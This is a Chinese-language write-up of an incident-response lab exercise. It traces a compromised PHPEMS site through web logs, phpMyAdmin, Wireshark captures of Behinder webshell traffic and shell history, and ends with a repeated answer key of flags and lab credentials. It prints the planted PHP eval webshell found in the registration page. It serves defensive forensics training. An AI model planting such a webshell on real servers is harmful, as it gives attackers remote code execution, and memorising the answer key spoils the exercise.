HW–应急响应靶机–Linux2
所有靶机均来自
知攻善防实验室
靶机整理:
- 夸克网盘:https://pan.quark.cn/s/4b6dffd0c51a#/list/share
- 百度云盘:https://pan.baidu.com/s/1NnrS5asrS1Pw6LUbexewuA?pwd=txmy
官方WP:https://mp.weixin.qq.com/s/opj5dJK7htdawkmLbsSJiQ
蓝队应急响应工具箱:
夸克网盘:https://pan.quark.cn/s/6d7856efd1d1#/list/share
百度云盘:https://pan.baidu.com/s/1ZyrDPH6Ji88w9IJMoFpANA?pwd=ilzn
前景需要:
看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!
1,提交攻击者IP
2,提交攻击者修改的管理员密码(明文)
3,提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)
3,提交Webshell连接密码
4,提交数据包的flag1
5,提交攻击者使用的后续上传的木马文件名称
6,提交攻击者隐藏的flag2
7,提交攻击者隐藏的flag3
解题关键点
网站日志
PHPMyadmin | md5加密
注册页面被挂🐎
WireShark
冰蝎Webshell流量特征
history命令
环境变量
虚拟机登录
密码中的I为大写的ℹ️
查看虚拟机IP,我这里是10.10.10.53,NAT模式自动分配的
由于靶机是最小化模式的,不好操作,也不好复制粘贴,我们利用MobaXterm工具ssh连接靶机进行操作,也可以利用其他ssh连接工具,如Xshell等等
输入密码后发现成功登录靶机
发现当前路径下有一个数据包,还有题解系统
尝试运行题解系统,看需要获取哪些信息
攻击者IP
这个靶机是利用宝塔来管理的,修改宝塔面板密码为root
查看宝塔面板默认信息
登录宝塔面板
输入用户名密码
用户名:uysycv5w
密码:root
成功登录宝塔面板
在网站日志中可看到全部是 192.168.20.1
的IP地址
在 网站
选项卡中点击 127.0.0.1
进 行站点修改,也可看到IP
攻击者修改的管理员密码(明文)
数据库账号密码在那一行,密码点那个眼睛👀就可以显示,可以通过面板或者公共方式访问 phpMyAdmin
,都差不多
这里我们选择面板访问,输入账号密码
用户名:kaoshi
密码:5Sx8mK5ieyLPb84m
成功登录 phpMyAdmin
,发现 kaoshi
数据库
在第二页的 x2_user
表中发现账号密码,密码被加密了,需要查看源码看是什么加密算法来进行逆推
不过这里一眼就可以看出是md5加密,看源码只是为了防止密码被加盐
在 文件
选项卡下,发现了 register.app.php
是注册页面,双击文件即可打开在线编辑器查看文件,发现第65行,存储密码时调用了 modifyUserPassword
函数来加密
#register.app.php文件绝对路径
/www/wwwroot/127.0.0.1/app/user/controller/register.app.php
之后在 user.cls.php
页面中发现 modifyUserPassword
函数代码块,发现利用的是md5加密算法
#user.cls.php文件绝对路径
/www/wwwroot/127.0.0.1/app/user/cls/user.cls.php
直接将peadmin
用户的密码密文放到在线解密网站去解密
在线md5解密网站:
https://www.somd5.com/
密文:
f6f6eb5ace977d7e114377cc7098b7e3
得出明文密码为 Network@2020
第一次Webshell的连接URL
在 网站
选项卡下,双击 127.0.0.1
或者点击最右边的设置
,在 域名管理
中添加一个域名,我添加的是靶机机器IP 10.10.10.53
,之后就可以访问靶机Web页面
访问靶机Web页面,发现是PHPEMS模拟考试系统
拿刚刚获取的账号密码登录网站
账号:
peadmin
密码:
Network@2020
然后点击 个人中心
页面的 后台管理
成功进入网站后台管理页面
在 内容
页面的 标签管理
选择卡中发现木马文件
发现木马写在了 注册协议
的 注册页面
,注册协议的路由为 user-app-register
那提交第一次Webshell的连接URL则为
http://10.10.10.53/index.php?user-app-register
Webshell连接密码
在内容
选项卡页面的标签管理
中发现木马文件
#木马文件源码
<?php
namespace t;
@eval($_POST['Network2020']);
?>
则Webshell的连接密码为 Network2020
数据包的flag1
下载 /root
目录下的 数据包1.pcapng
如果用的是 MobaXterm
软件可以直接拖拽至桌面即可完成下载,其他ssh连接软件自行网上查找下载办法,或者利用其他办法,如SCP、FTP、临时HTTP服务下载等等,这里不多赘述,请自行百度
将数据包用 WireShark
打开,之后输入 tcp.stream eq 20
过滤出一段数据流,选择 /flag1
那一行右键,在弹出的菜单栏中选择 追踪流
— TCP流
,即可弹出页面,在页面中发现 flag1
flag1{Network@_2020_Hack}
攻击者使用的后续上传的木马文件名称
输入 tcp.stream eq 30
过滤出一段数据流,选择 /version2.php
那一行右键,在弹出的菜单栏中选择 追踪流
— TCP流
,即可弹出页面,在页面中发现经典的 冰蝎Webshell特征
冰蝎Webshell流量特征参考文章:冰蝎4.0特征分析及流量检测思路 - FreeBuf网络安全行业门户
#木马名称
version2.php
攻击者隐藏的flag2
查看 history
命令出来的命令历史记录,发现攻击者疑似依次修改过mpnotify.php
与 alinotify.php
两个文件
依据历史命令得知这两个文件是在.api/
目录下的,查看两个文件存放位置
mpnotify.php
文件没有发现异常
在 alinotify.php
文件中发现flag2
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
攻击者隐藏的flag3
history命令查看命令记录发现攻击者创建了一个用户flag3
,定义了一个全局变量$flag3
,疑似修改了环境变量文件/etc/profile
,env命令(显示系统的环境变量)也有嫌疑
查看文件、变量、env命令都可查看到flag3
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
成功通关
#wp通关Payload
192.168.20.1
Network@2020
index.php?user-app-register
Network2020
flag1{Network@_2020_Hack}
version2.php
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}
成功通关
#wp通关Payload
192.168.20.1
Network@2020
index.php?user-app-register
Network2020
flag1{Network@_2020_Hack}
version2.php
flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}
flag{5LourqoFt5d2zyOVUoVPJbOmeVmoKgcy6OZ}